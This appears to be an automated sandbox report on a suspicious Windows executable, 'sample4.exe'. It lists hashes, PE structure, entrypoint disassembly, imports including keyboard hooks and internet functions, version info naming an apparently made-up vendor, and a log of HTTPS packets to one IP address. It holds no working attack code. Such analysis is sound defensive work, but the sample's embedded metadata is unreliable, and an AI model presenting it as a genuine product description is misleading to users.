                                                                                                                                                                                                                                                              Preview: MDMP....... .......G3.`...................U...........B..............GenuineIntelW...........T.......4....2.`:............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

                                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Entropy (8bit):6.548995136814184
                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 98.68%
                                                                                                                                                                                                                                                              • Windows ActiveX control (116523/4) 1.15%
                                                                                                                                                                                                                                                              • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                              File name:sample4.exe
                                                                                                                                                                                                                                                              File size:2136576
                                                                                                                                                                                                                                                              MD5:5009b8bcf024704c8b23e42c492f118c
                                                                                                                                                                                                                                                              SHA1:df607367a88b5610a224909efb8debeb0d90f487
                                                                                                                                                                                                                                                              SHA256:30f099660904079afcd445409cfd2eca735fab49dda522f03ed60d47f9f21bdc
                                                                                                                                                                                                                                                              SHA512:70c4d7c6b9124246def27e28b69f2eb30bac85a5c0e8b38cf593222bec02c561143ebf0995946d1c30ef5441a6152cf587ef2d70651482374017a321df1c8e3b
                                                                                                                                                                                                                                                              SSDEEP:49152:o8X7Gl0vopNbyrbGhp475YHHmfjlzukdQ+ILi2k4TmRB:Z4Gopkrbk4UHmfhzukfILi2k4Tm
                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,0Y..................................... ................................"......v!...@................................

                                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                                              Icon Hash:71c4b2f0e8d4c4c6

                                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Entrypoint:0x11796e8
                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                              Imagebase:0x1000000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                                                              Time Stamp:0x59302CB5 [Thu Jun 1 15:03:17 2017 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                              Import Hash:7da84c744589b5da0e6e3eb22df0b736

                                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                              call 00007FDD8C93D2C9h
                                                                                                                                                                                                                                                              jmp 00007FDD8C93C753h
                                                                                                                                                                                                                                                              jmp dword ptr [011D49B8h]
                                                                                                                                                                                                                                                              mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                              mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                                                                                                              pop ecx
                                                                                                                                                                                                                                                              pop edi
                                                                                                                                                                                                                                                              pop edi
                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                              pop ebx
                                                                                                                                                                                                                                                              mov esp, ebp
                                                                                                                                                                                                                                                              pop ebp
                                                                                                                                                                                                                                                              push ecx
                                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                                              mov ecx, dword ptr [ebp-10h]
                                                                                                                                                                                                                                                              xor ecx, ebp
                                                                                                                                                                                                                                                              call 00007FDD8C93C08Ah
                                                                                                                                                                                                                                                              jmp 00007FDD8C93C8A0h
                                                                                                                                                                                                                                                              mov ecx, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                              xor ecx, ebp
                                                                                                                                                                                                                                                              call 00007FDD8C93C079h
                                                                                                                                                                                                                                                              jmp 00007FDD8C93C88Fh
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              push dword ptr fs:[00000000h]
                                                                                                                                                                                                                                                              lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                              sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                              mov dword ptr [eax], ebp
                                                                                                                                                                                                                                                              mov ebp, eax
                                                                                                                                                                                                                                                              mov eax, dword ptr [011B2F64h]
                                                                                                                                                                                                                                                              xor eax, ebp
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              push dword ptr [ebp-04h]
                                                                                                                                                                                                                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                              mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              push dword ptr fs:[00000000h]
                                                                                                                                                                                                                                                              lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                              sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                              mov dword ptr [eax], ebp
                                                                                                                                                                                                                                                              mov ebp, eax
                                                                                                                                                                                                                                                              mov eax, dword ptr [011B2F64h]
                                                                                                                                                                                                                                                              xor eax, ebp
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              mov dword ptr [ebp-10h], eax
                                                                                                                                                                                                                                                              push dword ptr [ebp-04h]
                                                                                                                                                                                                                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                              mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              push dword ptr fs:[00000000h]
                                                                                                                                                                                                                                                              lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                              sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                              mov dword ptr [eax], ebp

                                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1d49bc0x168.idata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1f40000x17c2c.rsrc
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x20c0000x1d2c0.reloc
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x38f600x54.text
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x38fb40x18.text
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2b6700x40.text
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x1d40000x9b8.idata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                              .text0x10000x1b02f40x1b0400False0.510258707165data6.51268656796IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .data0x1b20000x21d980x5c00False0.319166100543data5.12748414797IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .idata0x1d40000x3f8e0x4000False0.398986816406data5.55581211033IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .gfids0x1d80000x19e580x1a000False0.296001727764data4.22633465795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .giats0x1f20000x100x200False0.05078125data0.155177575305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .tls0x1f30000x90x200False0.033203125data0.0203931352361IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .rsrc0x1f40000x17c2c0x17e00False0.248680873691data4.95227644363IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .reloc0x20c0000x1d2c00x1d400False0.432366786859data6.49808502841IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                                                              RT_ICON0x1f43700x94a8dataEnglishUnited States
                                                                                                                                                                                                                                                              RT_ICON0x1fd8180x5488dataEnglishUnited States
                                                                                                                                                                                                                                                              RT_ICON0x202ca00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 15794175, next used block 4294905600EnglishUnited States
                                                                                                                                                                                                                                                              RT_ICON0x206ec80x25a8dataEnglishUnited States
                                                                                                                                                                                                                                                              RT_ICON0x2094700x10a8dataEnglishUnited States
                                                                                                                                                                                                                                                              RT_ICON0x20a5180x988dataEnglishUnited States
                                                                                                                                                                                                                                                              RT_ICON0x20aea00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                                              RT_DIALOG0x20b3080xb0dataEnglishUnited States
                                                                                                                                                                                                                                                              RT_DIALOG0x20b3b80xb8dataEnglishUnited States
                                                                                                                                                                                                                                                              RT_STRING0x20b4700x82dataEnglishUnited States
                                                                                                                                                                                                                                                              RT_STRING0x20b4f40x1badataEnglishUnited States
                                                                                                                                                                                                                                                              RT_STRING0x20b6b00x54dataEnglishUnited States
                                                                                                                                                                                                                                                              RT_GROUP_ICON0x20b7040x68dataEnglishUnited States
                                                                                                                                                                                                                                                              RT_VERSION0x20b76c0x364dataEnglishUnited States
                                                                                                                                                                                                                                                              RT_MANIFEST0x20bad00x15aASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                              GDI32.dllGetViewportOrgEx, GetWindowOrgEx, SetPixelV, SetPaletteEntries, ExtFloodFill, PtInRegion, GetBoundsRect, FrameRgn, FillRgn, GetTextFaceW, ScaleWindowExtEx, CreateCompatibleDC, CreateFontW, GetPixel, CreateRectRgn, SelectClipRgn, RoundRect, OffsetRgn, GetRgnBox, Rectangle, LPtoDP, CreateRoundRectRgn, Polyline, Polygon, CreatePolygonRgn, GetTextColor, Ellipse, CreateEllipticRgn, SetDIBColorTable, CreateDIBSection, StretchBlt, SetPixel, GetTextCharsetInfo, EnumFontFamiliesW, CreateDIBitmap, CreateCompatibleBitmap, GetBkColor, RealizePalette, GetSystemPaletteEntries, GetPaletteEntries, GetNearestPaletteIndex, CreatePalette, EnumFontFamiliesExW, GetTextMetricsW, DPtoLP, SetRectRgn, PatBlt, CreateRectRgnIndirect, CombineRgn, GetTextExtentPoint32W, ScaleViewportExtEx, OffsetWindowOrgEx, OffsetViewportOrgEx, SetWindowOrgEx, SetWindowExtEx, SetViewportOrgEx, SetViewportExtEx, CopyMetaFileW, CreateDCW, GetDeviceCaps, CreateBitmap, SetBkColor, SetTextColor, GetObjectW, DeleteObject, BitBlt, CreateHatchBrush, CreatePen, CreatePatternBrush, CreateSolidBrush, DeleteDC, Escape, ExcludeClipRect, GetClipBox, GetObjectType, GetStockObject, GetViewportExtEx, GetWindowExtEx, IntersectClipRect, LineTo, PtVisible, RectVisible, RestoreDC, SaveDC, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetTextAlign, MoveToEx, TextOutW, ExtTextOutW, CreateFontIndirectW
                                                                                                                                                                                                                                                              KERNEL32.dllFreeEnvironmentStringsW, GetConsoleMode, GetConsoleCP, HeapCreate, LCMapStringW, GetTimeZoneInformation, VirtualProtect, HeapFree, GetDiskFreeSpaceW, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, GetEnvironmentVariableW, CreateFileW, GetCurrentThreadId, HeapValidate, FindFirstChangeNotificationW, HeapSize, Sleep, GetLastError, HeapReAlloc, GetStdHandle, ExitProcess, GetFileType, SetStdHandle, QueryPerformanceFrequency, WriteConsoleW, GetStringTypeW, VirtualAlloc, GetCommandLineW, GetCommandLineA, HeapQueryInformation, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, CreateThread, SetEnvironmentVariableW, RaiseException, GetEnvironmentStringsW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, GetFileTime, FreeLibrary, GetProcessHeap, GetCurrentProcessId, DeleteCriticalSection, GetTimeFormatW, DecodePointer, HeapCompact, GetLocalTime, HeapAlloc, LoadLibraryW, GetSystemInfo, VirtualQuery, GetModuleHandleW, GetProcAddress, LoadLibraryExA, OutputDebugStringA, SetLastError, GetModuleHandleA, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GlobalAlloc, GlobalReAlloc, GlobalLock, GlobalHandle, GlobalUnlock, GlobalFree, LocalAlloc, LocalReAlloc, LocalFree, LoadResource, LockResource, SizeofResource, FindResourceW, WideCharToMultiByte, GlobalSize, MulDiv, FormatMessageW, CopyFileW, MultiByteToWideChar, CloseHandle, SetEvent, WaitForSingleObject, CreateEventW, SetThreadPriority, ResumeThread, lstrcmpA, GlobalGetAtomNameW, FileTimeToSystemTime, EncodePointer, GetSystemDirectoryW, FreeResource, LoadLibraryExW, GlobalDeleteAtom, lstrcmpW, LoadLibraryA, GlobalAddAtomW, GlobalFindAtomW, FindClose, FindFirstFileW, FlushFileBuffers, GetFileSize, GetFullPathNameW, GetVolumeInformationW, LockFile, ReadFile, SetEndOfFile, SetFilePointer, UnlockFile, WriteFile, DuplicateHandle, GetCurrentProcess, lstrcmpiW, CompareStringW, GetUserDefaultUILanguage, GlobalFlags, GetVersionExW, FileTimeToLocalFileTime, GetFileAttributesW, GetFileAttributesExW, GetFileSizeEx, SystemTimeToTzSpecificLocalTime, lstrcpyW, GetCurrentDirectoryW, FindResourceExW, GetWindowsDirectoryW, VerSetConditionMask, VerifyVersionInfoW, GetTempFileNameW, GetTempPathW, GetTickCount, GetProfileIntW, SearchPathW, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, OutputDebugStringW, RtlUnwind, SetFilePointerEx
                                                                                                                                                                                                                                                              USER32.dllUnhookWindowsHookEx, SendMessageW, EnableWindow, IsWindowEnabled, MessageBoxW, GetWindowLongW, GetParent, GetLastActivePopup, GetMenuStringW, GetSubMenu, GetMenuItemID, GetMenuItemCount, InsertMenuW, AppendMenuW, RemoveMenu, GetMessageW, TranslateMessage, DispatchMessageW, PeekMessageW, IsWindowVisible, GetActiveWindow, GetKeyState, ValidateRect, GetCursorPos, SetWindowsHookExW, CallNextHookEx, GetSystemMetrics, GetDC, ReleaseDC, GetSysColor, LoadCursorW, GetWindowTextW, GetWindowTextLengthW, GetFocus, CheckMenuItem, EnableMenuItem, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, SetMenuItemInfoW, LoadBitmapW, RegisterWindowMessageW, GetMessagePos, GetMessageTime, PostMessageW, DefWindowProcW, CallWindowProcW, RegisterClassW, GetClassInfoW, GetClassInfoExW, CreateWindowExW, IsWindow, IsMenu, IsChild, DestroyWindow, SetWindowPos, GetWindowPlacement, SetWindowPlacement, BeginDeferWindowPos, DeferWindowPos, EndDeferWindowPos, IsIconic, GetDlgItem, GetDlgCtrlID, SetFocus, GetCapture, GetMenu, SetMenu, TrackPopupMenu, UpdateWindow, SetActiveWindow, SetForegroundWindow, BeginPaint, EndPaint, RedrawWindow, ScrollWindow, SetScrollPos, GetScrollPos, SetScrollRange, GetScrollRange, ShowScrollBar, SetPropW, GetPropW, RemovePropW, AdjustWindowRectEx, ScreenToClient, MapWindowPoints, CopyRect, EqualRect, PtInRect, SetWindowLongW, GetClassLongW, GetClassNameW, GetTopWindow, GetWindow, LoadIconW, SetScrollInfo, GetScrollInfo, WinHelpW, MonitorFromWindow, GetMonitorInfoW, ShowWindow, MoveWindow, CheckDlgButton, GetWindowThreadProcessId, SetWindowTextW, IsDialogMessageW, DestroyIcon, CharUpperW, ClientToScreen, GetDesktopWindow, RealChildWindowFromPoint, DrawTextW, DrawTextExW, GrayStringW, TabbedTextOutW, GetWindowDC, FillRect, DestroyMenu, GetMenuItemInfoW, InflateRect, SystemParametersInfoW, CopyImage, SendDlgItemMessageA, SetRectEmpty, OffsetRect, PostQuitMessage, EndDialog, GetNextDlgTabItem, GetAsyncKeyState, MapDialogRect, IntersectRect, TrackMouseEvent, InvalidateRect, LoadImageW, ShowOwnedPopups, SetCursor, DeleteMenu, SetTimer, KillTimer, GetNextDlgGroupItem, SetCapture, ReleaseCapture, WindowFromPoint, DrawFocusRect, IsRectEmpty, DrawIconEx, GetIconInfo, MessageBeep, EnableScrollBar, HideCaret, InvertRect, NotifyWinEvent, GetMenuDefaultItem, MapVirtualKeyW, GetKeyNameTextW, LoadMenuW, SetLayeredWindowAttributes, EnumDisplayMonitors, SetClassLongW, SetWindowRgn, SetParent, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, DrawStateW, DrawEdge, DrawFrameControl, IsZoomed, GetSystemMenu, BringWindowToTop, SetCursorPos, CopyIcon, FrameRect, DrawIcon, UnionRect, UpdateLayeredWindow, MonitorFromPoint, LoadAcceleratorsW, TranslateAcceleratorW, InsertMenuItemW, UnpackDDElParam, ReuseDDElParam, GetComboBoxInfo, PostThreadMessageW, WaitMessage, GetKeyboardLayout, IsCharLowerW, MapVirtualKeyExW, ToUnicodeEx, GetKeyboardState, CreateAcceleratorTableW, DestroyAcceleratorTable, CopyAcceleratorTableW, SetRect, LockWindowUpdate, SetMenuDefaultItem, GetDoubleClickTime, ModifyMenuW, RegisterClipboardFormatW, CharUpperBuffW, IsClipboardFormatAvailable, GetUpdateRect, DrawMenuBar, DefFrameProcW, DefMDIChildProcW, TranslateMDISysAccel, SubtractRect, CreateMenu, GetWindowRgn, DestroyCursor, GetWindowRect, CreatePopupMenu, GetForegroundWindow, DialogBoxIndirectParamW, GetClientRect, GetSysColorBrush, CreateDialogIndirectParamW, GetMenuState
                                                                                                                                                                                                                                                              COMCTL32.dllImageList_SetOverlayImage, CreateStatusWindowW, CreateToolbarEx, DestroyPropertySheetPage, ImageList_LoadImageW
                                                                                                                                                                                                                                                              COMDLG32.dllGetFileTitleW, GetSaveFileNameW, FindTextW, GetOpenFileNameW
                                                                                                                                                                                                                                                              ole32.dllCoInitializeEx, IsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleLockRunning, RevokeDragDrop, RegisterDragDrop, CoLockObjectExternal, OleGetClipboard, DoDragDrop, CreateStreamOnHGlobal, CoCreateInstance, CoDisconnectObject, ReleaseStgMedium, OleDuplicateData, CoTaskMemFree, CoTaskMemAlloc, CoRevokeClassObject, OleInitialize, CoUninitialize, OleSetContainedObject, CoInitialize, OleUninitialize
                                                                                                                                                                                                                                                              WS2_32.dllsetsockopt, WSACleanup, WSACloseEvent, WSACreateEvent, getprotobynumber, WSAStartup, WSAConnect, socket, WSAAddressToStringW, getservbyname
                                                                                                                                                                                                                                                              WININET.dllInternetCanonicalizeUrlW, InternetOpenUrlW, InternetWriteFile, InternetOpenW, InternetReadFile, InternetCloseHandle, InternetQueryDataAvailable, InternetCrackUrlW, InternetSetFilePointer, HttpQueryInfoW
                                                                                                                                                                                                                                                              SHLWAPI.dllPathCanonicalizeW, PathIsRootW, StrCmpW, StrFormatKBSizeW, PathRemoveFileSpecW, PathFindExtensionW, PathStripToRootW, SHCreateStreamOnFileW, PathIsUNCW, PathFindFileNameW
                                                                                                                                                                                                                                                              UxTheme.dllGetThemeTextExtent, DrawThemeText, DrawThemeParentBackground, OpenThemeData, GetThemeBackgroundRegion, CloseThemeData, DrawThemeBackground, GetThemePartSize, GetThemeSysColor, IsThemeBackgroundPartiallyTransparent, IsAppThemed, GetWindowTheme, GetCurrentThemeName, GetThemeColor
                                                                                                                                                                                                                                                              IMM32.dllImmGetContext, ImmReleaseContext, ImmSetCompositionFontW, ImmSetCompositionWindow, ImmGetCompositionStringW, ImmNotifyIME, ImmGetOpenStatus
                                                                                                                                                                                                                                                              WINSPOOL.DRVClosePrinter, DocumentPropertiesW, OpenPrinterW
                                                                                                                                                                                                                                                              OLEACC.dllAccessibleObjectFromWindow, LresultFromObject, CreateStdAccessibleObject
                                                                                                                                                                                                                                                              SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteW, SHGetFileInfoW, SHAppBarMessage, SHBrowseForFolderW, DragFinish, DragQueryFileW, SHGetPathFromIDListW, SHGetDesktopFolder
                                                                                                                                                                                                                                                              gdiplus.dllGdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdipCreateBitmapFromHBITMAP, GdipDrawImageI, GdipDeleteGraphics, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromStream, GdipGetImagePaletteSize, GdipGetImagePalette, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipGetImageGraphicsContext, GdipCloneImage, GdiplusStartup, GdipFree, GdipAlloc, GdiplusShutdown, GdipDisposeImage
                                                                                                                                                                                                                                                              ADVAPI32.dllRegDeleteValueW, RegCreateKeyExW, RegDeleteKeyW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegEnumKeyExW, RegCloseKey
                                                                                                                                                                                                                                                              MSIMG32.dllTransparentBlt, AlphaBlend

                                                                                                                                                                                                                                                              Version Infos

                                                                                                                                                                                                                                                              DescriptionData
                                                                                                                                                                                                                                                              LegalCopyright Column tell Corporation. All rights reserved.
                                                                                                                                                                                                                                                              InternalNamearra.exe
                                                                                                                                                                                                                                                              FileVersion10.7.14.75 built by: 39959
                                                                                                                                                                                                                                                              CompanyNameColumn tell Corporation
                                                                                                                                                                                                                                                              ProductNameColumn tell Column tell 2014
                                                                                                                                                                                                                                                              ProductVersion10.7.14.75
                                                                                                                                                                                                                                                              FileDescriptionColumn tell Nine in
                                                                                                                                                                                                                                                              OriginalFilenamearra.exe
                                                                                                                                                                                                                                                              Translation0x0409 0x04b0

                                                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:17.927963018 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:17.968168020 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:17.968981028 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:17.971504927 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.011701107 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.012576103 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.012602091 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.012618065 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.012722015 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.022810936 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.062938929 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.063695908 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.069999933 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.110133886 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.223429918 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.226116896 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.266465902 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.385466099 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.385489941 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.385500908 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.385516882 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.385529995 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.385548115 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.385560989 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.385569096 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.385586023 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.385592937 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.385724068 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.425858021 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.425884962 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.425900936 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.425925016 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.425942898 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.425960064 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.425976992 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.425988913 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.425993919 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.426012993 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.426023006 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.426028967 CET44349761104.244.42.131192.168.2.3
